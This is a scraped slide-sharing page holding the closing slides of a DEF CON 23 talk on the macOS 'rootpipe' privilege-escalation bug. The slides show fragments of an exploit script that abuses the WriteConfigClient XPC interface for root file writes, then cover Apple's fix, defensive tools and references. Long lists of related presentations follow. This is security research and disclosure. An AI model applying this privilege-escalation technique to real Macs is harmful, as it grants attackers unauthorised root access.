  auth's	
  with	
  'WriteConfigClient'	
  XPC	
  &	
  invokes	
  createFileWithContents:path:attributes:	
  
	
  	
  #	
  	
  	
  since	
  Directory	
  Utility.app	
  contains	
  the	
  'com.apple.private.admin.writeconfig'	
  entitlement,	
  we're	
  set	
  ;)	
  
	
  	
  os.system('open	
  "%s"	
  &'	
  %	
  destination)	
  
	
  	
  	
  	
  	
  	
  	
  	
  
if only all priv-esc bugs where this easy!
PHOENIX.PY
phoenix python script
take 2 ->m0ar checks
APPLE'S FIX: CVE-2015-3673
OS X 10.10
OS X 10.10.3
OS X 10.10.4	
  listener:shouldAcceptNewConnection:
improved authentication & location checks
APPLE FIX: CVE-2015-3673
new entitlements
com.apple.private.admin.writeconfig.voiceover
location checks
binary in /System
"The problem of their fix is that there are at least some 50+
binarie [sic] using it. A single exploit in one of them and the
system is owned again because there is no fundamental fix inside
writeconfig" -@osxreverser
}
com.apple.private.admin.writeconfig.enable-sharing
binary in /usr
}
OS X DEFENSE
keeping your mac secure
free OS X tools & malware samples
OBJECTIVE-SEE
malware samples :)
KnockKnock BlockBlock TaskExplorer
KNOCKKNOCK UI
detecting persistence: now an app for that!
KnockKnock (UI)
KNOCKKNOCK UI
VirusTotal integration
detect submit rescan results
VirusTotal integrations
BLOCKBLOCK
a 'firewall' for persistence locations
status bar
BlockBlock, block blocking :)
HackingTeam's OS X
implant
"0-day bug hijacks
Macs" (payload)
TASKEXPLORER
explore all running tasks (processes) filters
signing
virus total
dylibs
files
network
CONCLUSIONS
…wrapping this up
OS X security, is
often quite lame!
XPC interfaces malware patches
}
audit all thingz!
QUESTIONS & ANSWERS
patrick@synack.com
@patrickwardle
feel free to contact me any time!
"What if every country has ninjas, but we only know about the
Japanese ones because they’re rubbish?" -DJ-2000, reddit.com
final thought ;)
syn.ac/defconRootPipe
}
credits
- thezooom.com
- deviantart.com (FreshFarhan)
- http://th07.deviantart.net/fs70/PRE/f/2010/206/4/4/441488bcc359b59be409ca02f863e843.jpg 

- iconmonstr.com
- flaticon.com
- https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x
- https://reverse.put.as/2015/04/13/how-to-fix-rootpipe-in-mavericks-and-call-apples-bullshit-bluff-
about-rootpipe-fixes/
- http://www.objc.io/issues/14-mac/xpc/
- https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again
images
resources

More Related Content

What's hot

RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX Malware
Synack
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
Synack
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation Primitives
Synack
 
DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 Devices
Synack
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
Synack
 
DLL Hijacking on OS X
DLL Hijacking on OS XDLL Hijacking on OS X
DLL Hijacking on OS X
Synack
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
Jen Andre
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack aws
Jen Andre
 
Fire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsFire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS Firewalls
Priyanka Aash
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
Felipe Prado
 
DEFCON 23 - Patrick Wardle - stick that in your (root)pipe and smoke it
DEFCON 23 - Patrick Wardle - stick that in your (root)pipe and smoke itDEFCON 23 - Patrick Wardle - stick that in your (root)pipe and smoke it
DEFCON 23 - Patrick Wardle - stick that in your (root)pipe and smoke it
Felipe Prado
 
Poc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitian
Poc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitianPoc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitian
Poc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitian
Liang Chen
 
The Mouse is mightier than the sword
The Mouse is mightier than the swordThe Mouse is mightier than the sword
The Mouse is mightier than the sword
Priyanka Aash
 
Astricon 2013: "Asterisk and Database"
Astricon 2013: "Asterisk and Database"Astricon 2013: "Asterisk and Database"
Astricon 2013: "Asterisk and Database"
Francesco Prior
 
Csw2016 economou nissim-getting_physical
Csw2016 economou nissim-getting_physicalCsw2016 economou nissim-getting_physical
Csw2016 economou nissim-getting_physical
CanSecWest
 
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesConf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
BrentMatlock
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
Felipe Prado
 
Fosdem10
Fosdem10Fosdem10
Fosdem10
wremes
 
OSSEC @ ISSA Jan 21st 2010
OSSEC @ ISSA Jan 21st 2010OSSEC @ ISSA Jan 21st 2010
OSSEC @ ISSA Jan 21st 2010
wremes
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]
RootedCON
 

What's hot (20)

RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX Malware
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation Primitives
 
DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 Devices
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
 
DLL Hijacking on OS X
DLL Hijacking on OS XDLL Hijacking on OS X
DLL Hijacking on OS X
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack aws
 
Fire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsFire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS Firewalls
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
 
DEFCON 23 - Patrick Wardle - stick that in your (root)pipe and smoke it
DEFCON 23 - Patrick Wardle - stick that in your (root)pipe and smoke itDEFCON 23 - Patrick Wardle - stick that in your (root)pipe and smoke it
DEFCON 23 - Patrick Wardle - stick that in your (root)pipe and smoke it
 
Poc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitian
Poc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitianPoc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitian
Poc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitian
 
The Mouse is mightier than the sword
The Mouse is mightier than the swordThe Mouse is mightier than the sword
The Mouse is mightier than the sword
 
Astricon 2013: "Asterisk and Database"
Astricon 2013: "Asterisk and Database"Astricon 2013: "Asterisk and Database"
Astricon 2013: "Asterisk and Database"
 
Csw2016 economou nissim-getting_physical
Csw2016 economou nissim-getting_physicalCsw2016 economou nissim-getting_physical
Csw2016 economou nissim-getting_physical
 
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesConf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
 
Fosdem10
Fosdem10Fosdem10
Fosdem10
 
OSSEC @ ISSA Jan 21st 2010
OSSEC @ ISSA Jan 21st 2010OSSEC @ ISSA Jan 21st 2010
OSSEC @ ISSA Jan 21st 2010
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]
 

Viewers also liked

Synack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack cirtical infrasructure webinar
Synack cirtical infrasructure webinar
Synack
 
Zeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningZeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanning
Synack
 
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
Synack
 
Compare hk,taiwan,sh movies
Compare hk,taiwan,sh moviesCompare hk,taiwan,sh movies
Compare hk,taiwan,sh movies
Xiao Yun
 
Why National Brands Must Adapt to Changing Traveler Behavior
Why National Brands Must Adapt to Changing Traveler Behavior Why National Brands Must Adapt to Changing Traveler Behavior
Why National Brands Must Adapt to Changing Traveler Behavior
Placeable
 
Mgo eps mgo structural insulated panels
Mgo eps mgo structural insulated panelsMgo eps mgo structural insulated panels
Mgo eps mgo structural insulated panels
sips-structural-insulated-panels
 
Activity 1
Activity 1Activity 1
Activity 1
paola-rozo
 
Information literacy scaffolds in the 9-12 classroom
Information literacy scaffolds in the 9-12 classroomInformation literacy scaffolds in the 9-12 classroom
Information literacy scaffolds in the 9-12 classroom
fredandkell
 
Curriculo atualizado
Curriculo atualizadoCurriculo atualizado
Curriculo atualizado
Mariana Madalena
 
10 Passos para mudar sua vida completamente
10 Passos para mudar sua vida completamente 10 Passos para mudar sua vida completamente
10 Passos para mudar sua vida completamente
Paulo Nagawa
 
istilah-istilah jaringan internet dalam komputer
istilah-istilah jaringan internet dalam komputeristilah-istilah jaringan internet dalam komputer
istilah-istilah jaringan internet dalam komputer
Abednego Ringgo
 
Come scegliere l'album di matrimonio?
Come scegliere l'album di matrimonio?Come scegliere l'album di matrimonio?
Come scegliere l'album di matrimonio?
Marco Gabriella
 
The Multi-barrier Approach to Address Water Quality and Disease Prevention
The Multi-barrier Approach to Address Water Quality and Disease PreventionThe Multi-barrier Approach to Address Water Quality and Disease Prevention
The Multi-barrier Approach to Address Water Quality and Disease Prevention
Madelyn Skinner
 
Jesusparablesaboutmoney 12737974976907-phpapp02
Jesusparablesaboutmoney 12737974976907-phpapp02Jesusparablesaboutmoney 12737974976907-phpapp02
Jesusparablesaboutmoney 12737974976907-phpapp02
Sonu Jena
 
Sips structural insulated panels production line
Sips structural insulated panels production lineSips structural insulated panels production line
Sips structural insulated panels production line
sips-structural-insulated-panels
 
Osb sips structrual insulated panels
Osb sips structrual insulated panelsOsb sips structrual insulated panels
Osb sips structrual insulated panels
sips-structural-insulated-panels
 
Crack the Consumer Code
Crack the Consumer CodeCrack the Consumer Code
Crack the Consumer Code
Placeable
 
Log
LogLog
Thai horror cinema (lee sweetwan)
Thai horror cinema (lee sweetwan)Thai horror cinema (lee sweetwan)
Thai horror cinema (lee sweetwan)
Xiao Yun
 

Viewers also liked (19)

Synack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack cirtical infrasructure webinar
Synack cirtical infrasructure webinar
 
Zeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningZeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanning
 
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
 
Compare hk,taiwan,sh movies
Compare hk,taiwan,sh moviesCompare hk,taiwan,sh movies
Compare hk,taiwan,sh movies
 
Why National Brands Must Adapt to Changing Traveler Behavior
Why National Brands Must Adapt to Changing Traveler Behavior Why National Brands Must Adapt to Changing Traveler Behavior
Why National Brands Must Adapt to Changing Traveler Behavior
 
Mgo eps mgo structural insulated panels
Mgo eps mgo structural insulated panelsMgo eps mgo structural insulated panels
Mgo eps mgo structural insulated panels
 
Activity 1
Activity 1Activity 1
Activity 1
 
Information literacy scaffolds in the 9-12 classroom
Information literacy scaffolds in the 9-12 classroomInformation literacy scaffolds in the 9-12 classroom
Information literacy scaffolds in the 9-12 classroom
 
Curriculo atualizado
Curriculo atualizadoCurriculo atualizado
Curriculo atualizado
 
10 Passos para mudar sua vida completamente
10 Passos para mudar sua vida completamente 10 Passos para mudar sua vida completamente
10 Passos para mudar sua vida completamente
 
istilah-istilah jaringan internet dalam komputer
istilah-istilah jaringan internet dalam komputeristilah-istilah jaringan internet dalam komputer
istilah-istilah jaringan internet dalam komputer
 
Come scegliere l'album di matrimonio?
Come scegliere l'album di matrimonio?Come scegliere l'album di matrimonio?
Come scegliere l'album di matrimonio?
 
The Multi-barrier Approach to Address Water Quality and Disease Prevention
The Multi-barrier Approach to Address Water Quality and Disease PreventionThe Multi-barrier Approach to Address Water Quality and Disease Prevention
The Multi-barrier Approach to Address Water Quality and Disease Prevention
 
Jesusparablesaboutmoney 12737974976907-phpapp02
Jesusparablesaboutmoney 12737974976907-phpapp02Jesusparablesaboutmoney 12737974976907-phpapp02
Jesusparablesaboutmoney 12737974976907-phpapp02
 
Sips structural insulated panels production line
Sips structural insulated panels production lineSips structural insulated panels production line
Sips structural insulated panels production line
 
Osb sips structrual insulated panels
Osb sips structrual insulated panelsOsb sips structrual insulated panels
Osb sips structrual insulated panels
 
Crack the Consumer Code
Crack the Consumer CodeCrack the Consumer Code
Crack the Consumer Code
 
Log
LogLog
Log
 
Thai horror cinema (lee sweetwan)
Thai horror cinema (lee sweetwan)Thai horror cinema (lee sweetwan)
Thai horror cinema (lee sweetwan)
 

Similar to DEF CON 23: Stick That In Your (root)Pipe & Smoke It

RESTful API In Node Js using Express
RESTful API In Node Js using Express RESTful API In Node Js using Express
RESTful API In Node Js using Express
Jeetendra singh
 
Building Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEisBuilding Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEis
FIWARE
 
Release with confidence
Release with confidenceRelease with confidence
Release with confidence
John Congdon
 
Future Decoded - Node.js per sviluppatori .NET
Future Decoded - Node.js per sviluppatori .NETFuture Decoded - Node.js per sviluppatori .NET
Future Decoded - Node.js per sviluppatori .NET
Gianluca Carucci
 
maxbox starter72 multilanguage coding
maxbox starter72 multilanguage codingmaxbox starter72 multilanguage coding
maxbox starter72 multilanguage coding
Max Kleiner
 
TO Hack an ASP .NET website?
TO Hack an ASP .NET website?  TO Hack an ASP .NET website?
TO Hack an ASP .NET website?
Positive Hack Days
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
Positive Hack Days
 
Gr8conf EU 2018 - Bring you infrastructure under control with Infrastructor
Gr8conf EU 2018 - Bring you infrastructure under control with InfrastructorGr8conf EU 2018 - Bring you infrastructure under control with Infrastructor
Gr8conf EU 2018 - Bring you infrastructure under control with Infrastructor
Stanislav Tiurikov
 
Power ai image-pipeline
Power ai image-pipelinePower ai image-pipeline
Power ai image-pipeline
Paulo Sergio Lemes Queiroz
 
OneTeam Media Server
OneTeam Media ServerOneTeam Media Server
OneTeam Media Server
Mickaël Rémond
 
Electron Firenze 2020: Linux, Windows o MacOS?
Electron Firenze 2020: Linux, Windows o MacOS?Electron Firenze 2020: Linux, Windows o MacOS?
Electron Firenze 2020: Linux, Windows o MacOS?
Denny Biasiolli
 
Electron: Linux, Windows or Macos?
Electron: Linux, Windows or Macos?Electron: Linux, Windows or Macos?
Electron: Linux, Windows or Macos?
Commit University
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
Igor Bronovskyy
 
containerit at useR!2017 conference, Brussels
containerit at useR!2017 conference, Brusselscontainerit at useR!2017 conference, Brussels
containerit at useR!2017 conference, Brussels
Daniel Nüst
 
Android Networking
Android NetworkingAndroid Networking
Android Networking
Maksym Davydov
 
Automation with Packer and TerraForm
Automation with Packer and TerraFormAutomation with Packer and TerraForm
Automation with Packer and TerraForm
Wesley Charles Blake
 
Alexey Orlenko ''High-performance IPC and RPC for microservices and apps''
Alexey Orlenko ''High-performance IPC and RPC for microservices and apps''Alexey Orlenko ''High-performance IPC and RPC for microservices and apps''
Alexey Orlenko ''High-performance IPC and RPC for microservices and apps''
OdessaJS Conf
 
Divide and Conquer – Microservices with Node.js
Divide and Conquer – Microservices with Node.jsDivide and Conquer – Microservices with Node.js
Divide and Conquer – Microservices with Node.js
Sebastian Springer
 
Local SQLite Database with Node for beginners
Local SQLite Database with Node for beginnersLocal SQLite Database with Node for beginners
Local SQLite Database with Node for beginners
Laurence Svekis ✔
 
WebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLSTWebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLST
enpit GmbH & Co. KG
 

Similar to DEF CON 23: Stick That In Your (root)Pipe & Smoke It (20)

RESTful API In Node Js using Express
RESTful API In Node Js using Express RESTful API In Node Js using Express
RESTful API In Node Js using Express
 
Building Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEisBuilding Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEis
 
Release with confidence
Release with confidenceRelease with confidence
Release with confidence
 
Future Decoded - Node.js per sviluppatori .NET
Future Decoded - Node.js per sviluppatori .NETFuture Decoded - Node.js per sviluppatori .NET
Future Decoded - Node.js per sviluppatori .NET
 
maxbox starter72 multilanguage coding
maxbox starter72 multilanguage codingmaxbox starter72 multilanguage coding
maxbox starter72 multilanguage coding
 
TO Hack an ASP .NET website?
TO Hack an ASP .NET website?  TO Hack an ASP .NET website?
TO Hack an ASP .NET website?
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
 
Gr8conf EU 2018 - Bring you infrastructure under control with Infrastructor
Gr8conf EU 2018 - Bring you infrastructure under control with InfrastructorGr8conf EU 2018 - Bring you infrastructure under control with Infrastructor
Gr8conf EU 2018 - Bring you infrastructure under control with Infrastructor
 
Power ai image-pipeline
Power ai image-pipelinePower ai image-pipeline
Power ai image-pipeline
 
OneTeam Media Server
OneTeam Media ServerOneTeam Media Server
OneTeam Media Server
 
Electron Firenze 2020: Linux, Windows o MacOS?
Electron Firenze 2020: Linux, Windows o MacOS?Electron Firenze 2020: Linux, Windows o MacOS?
Electron Firenze 2020: Linux, Windows o MacOS?
 
Electron: Linux, Windows or Macos?
Electron: Linux, Windows or Macos?Electron: Linux, Windows or Macos?
Electron: Linux, Windows or Macos?
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
 
containerit at useR!2017 conference, Brussels
containerit at useR!2017 conference, Brusselscontainerit at useR!2017 conference, Brussels
containerit at useR!2017 conference, Brussels
 
Android Networking
Android NetworkingAndroid Networking
Android Networking
 
Automation with Packer and TerraForm
Automation with Packer and TerraFormAutomation with Packer and TerraForm
Automation with Packer and TerraForm
 
Alexey Orlenko ''High-performance IPC and RPC for microservices and apps''
Alexey Orlenko ''High-performance IPC and RPC for microservices and apps''Alexey Orlenko ''High-performance IPC and RPC for microservices and apps''
Alexey Orlenko ''High-performance IPC and RPC for microservices and apps''
 
Divide and Conquer – Microservices with Node.js
Divide and Conquer – Microservices with Node.jsDivide and Conquer – Microservices with Node.js
Divide and Conquer – Microservices with Node.js
 
Local SQLite Database with Node for beginners
Local SQLite Database with Node for beginnersLocal SQLite Database with Node for beginners
Local SQLite Database with Node for beginners
 
WebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLSTWebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLST
 

Recently uploaded

Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
MichaelKnudsen27
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Antonios Katsarakis
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
DanBrown980551
 
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
saastr
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
Zilliz
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
Tatiana Kojar
 
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
Edge AI and Vision Alliance
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
Pablo Gómez Abajo
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
Jason Yip
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
Fwdays
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Brandon Minnick, MBA
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
Zilliz
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
c5vrf27qcz
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
DianaGray10
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
saastr
 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
Safe Software
 
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
Neo4j
 

Recently uploaded (20)

Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
 
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
 
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
